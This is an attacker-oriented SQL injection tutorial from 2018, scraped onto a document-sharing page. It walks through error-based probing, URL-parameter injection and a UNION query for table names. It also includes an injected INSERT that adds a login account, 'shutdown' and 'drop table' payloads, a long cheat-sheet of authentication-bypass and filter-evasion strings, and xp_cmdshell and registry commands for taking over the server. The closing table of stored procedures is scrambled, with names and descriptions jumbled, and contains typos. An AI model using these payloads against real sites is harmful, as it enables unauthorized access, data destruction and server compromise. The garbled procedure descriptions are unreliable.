SQL Injection

March 29, 2018 | Author: Technocrawl | Category: Sql, Crime Prevention, Information Science, Databases, Computer Security Exploits
Share
Report this link


Comments



Description

SQL Injection – Full DisclosureSQL Injection is a Technique that exploits the vulnerability found in the Database just by executing SQL statements via the web browser. Let’s take a simple example of signing up a mail account for the first time. The input that a user enters in a input box in a website will get stored in a backend Database and once registered, the next time the user attempt logging in with username and password, it will compare the input given by the user with the data stored in the database, and if both matches, it will grant access to the specified user and will allow him to proceed further with that login, else it won’t. So, whatever an user gives as an input in the input box in websites, this will be taken to the backend process, the hackers take advantage of this and will input some SQL queries in the input boxes and if the site is vulnerable to SQL injection attack, then it will be compromised. Here comes the detailed information on how SQL injection works, SQL refers to Structured Query Language, can also be pronounced as Sequel is a common language for all the Databases for the manipulation of data stored in it. SQL queries are used to communicate with Databases interactively for any kind of manipulations like creating a new table, modifying, updating, deleting, dropping and so on. A legitimate user will give his valid credentials in the login form of a website, where as an hacker will try to execute SQL Queries in the input box instead of supplying credentials. The Browser sends the request to the server, and the server will execute the SQL query sent by the attacker. No one can easily hack into a server that is vulnerable to SQL injection without analyzing the column name, table name and at least some of its value. How to find a whether a site is vulnerable to SQL Injection? "Blind Injection" - is the prime step that any hacker can validate a site, whether it is vulberable to SQL Injection attack. The attackers would try to inject some blind injection like below, ' " '1 'a '; - Single Quotes Double Quotes Single Quote 1 Single Quote a Single Quotes Semi-colon What the hell, this will do? Well, this will fetch them a page with some error message generated by the Database and if it does then the site is vulnerable to SQL Injection. The database will generate some error message, because it doesn’t know how to render the query given and as a result will display an error, showing clearly that either the Database is not configured properly or the site by itself. Single quotes ' will often fetch you some errors. I got an Error, what to do next ? Even a kid can generate an error like this! Let’s get the hands wet here, Now try to obtain the column name, table name, Number of columns and tables available and it will do. Error by Blind Injection, ADODB.Recordset error '800a0bb9' Arguments are of the wrong type, are out of acceptable range, or are in conflict with one another. /admin/CheckLogin.asp, line 68 Even there are few admin, who will keep the default settings remain unchanged, in such cases try default credentials like sa and password, this depends upon the database. How to Obtain more details ? Try this too using a trial and error method but should be reasonable! Learn more about the errors generated by databases and inject a statement accordingly that would fetch you some more fruity info. Let me make one thing clear, that SQL Injection can be exploited in both ways, that is injection via input boxes like login, search and so on found on the site, and then by injecting in the URL. For sure the Database must return an error if you input a data of wrong type. Let’s take that the target URL looks like below, www.vulnsite.com\refer.asp?ID=3&action=view Try some trial and error method here, just by changing the URL parameters like below,... www.vulnsite.com\refer.asp?ID=0 www.vulnsite.com\refer.asp?ID=-1 www.vulnsite.com\refer.asp?ID=3&action=edit www.vulnsite.com\refer.asp?ID=3&action=manage www.vulnsite.com\refer.asp?ID=3&action=modify and so on...... ( Note : This is just a blind Injection ) www.vulnsite.com\refer.asp?ID=30 union select top 1 table_name from information_schema.tables-- The URL which is in blue color is a legitimate one, and the remaining contains malicious SQL Injection codes that will fetch you the table name from the victims database and let’s take you got the table name and its users, www.vulnsite.com\refer.asp?ID=30 insert into users('id','username','password','info')values(100,'crawl','pass','')— This will create a new user account in the database remotely, and now you can login with the newly created user account and can do whatever you wish to do. This is one of the ways, where as there are several other ways.... Even there are few SQL built-in procedures that widely open way for the hackers to remotely shutdown the SQL service, Drop the data that too without any primary authentication. '; shutdown -- Can be used to shutdown the SQL service remotely. '; drop table users -- Used to drop tables from the Database remotely. Here is a common one that really exploited most of the site previously, 1 = 1 -When an attacker inputs this inside the input box, what happens is that the statement 1=1 becomes true, since one always equals one ( 1 is equal to 1 ) is a globally true statement, and -- is used for commenting in SQL, so whatever that comes after -- will be ignored. just by injecting this an attacker can easily gain access to a vulnerable site and wreak havoc. Whatever you found till now were the familiar ones, but still there are mushrooms of Blind SQL injection found and it’s been listed here.... admin' -admin' # admin'/* 1=1-' or 1=1-' or 1=1# ' or 1=1/* ') or '1'='1-1' OR '1'='1 ') or ('1'='1-' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1-SELECT * FROM members WHERE username = 'admin'--' AND password = 'password' if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 SELECT login + '-' + password FROM members SELECT login || '-' || password FROM members SELECT CONCAT(login, password) FROM members SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) SELECT CHAR(75)+CHAR(76)+CHAR(77) SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1-DR/**/OP/*bypass blacklisting*/sampletable SELECT/*avoid-spaces*/password/**/FROM/**/Members SELECT /*!32302 1/0, */ 1 FROM tablename SELECT * FROM products WHERE id = 10; DROP members-- What else can an Hacker do with this ? If the site administrator is not aware of the built-in procedures that comes with SQL, and if it is not restricted, then the attacker can easily root the box. An attacker can remotely launch a CMD_SHELL and can execute commands and even shutdown the whole server resulting in Denial of Service ( DoS ) attack. They also can have access to registry, can create a new administrator account remotely and can change them into botnet and blah blah blah........... Here are the few, sp_passsword -> Changes password for a specific login name. e.g. EXEC sp_password ‘oldpass’, ‘newpass’, ‘username’ sp_tables -> Shows all the tables in the current database. e.g. EXEC sp_tables xp_cmdshell -> Runs arbitary command on the machine with administrator privileges. exec master..xp_cmdshel 'dir' -> Displays the directory listing of the current working directory e.g. master..xp_msver exec master..xp_cmdshel 'net1 user' xp_regaddmultistring xp_regdeletekey xp_regdeletevalue xp_regenumkeys xp_regenumvalues xp_regread xp_regremovemultistring xp_regwrite xp_terminate_process xp_availablemedia xp_dirtree Writes a registry key. Stops a process reveals the available drives on the box allows a directory tree to be obtained Reads a registry value Deletes a registry key. Deletes a registry value xp_enumdsn xp_loginconfig security xp_makecab files on the server xp_ntsec_enumdomains xp_terminate_process enumerates ODBC data sources on the server reveals the informatio about mode of the allows a user to create a compressed archive of enumerated domains that the server can access Terminates a process, given its PID There are few SQL Injection - vulnerability assessment tools available on the internet for free of cost, where you can assess whether your resource is vulnerable to SQL injection or not. SQLBF SQL Dict SQL Smack SQL Poke commands - MS SQL server password auditor MS SQL Based Dictionary cracker Used to execute remote commands SQL Port Scanner, connects with SA ands executes - Cybercrawler www.technocrawler.co.cc
Copyright © 2024 DOKUMEN.SITE Inc.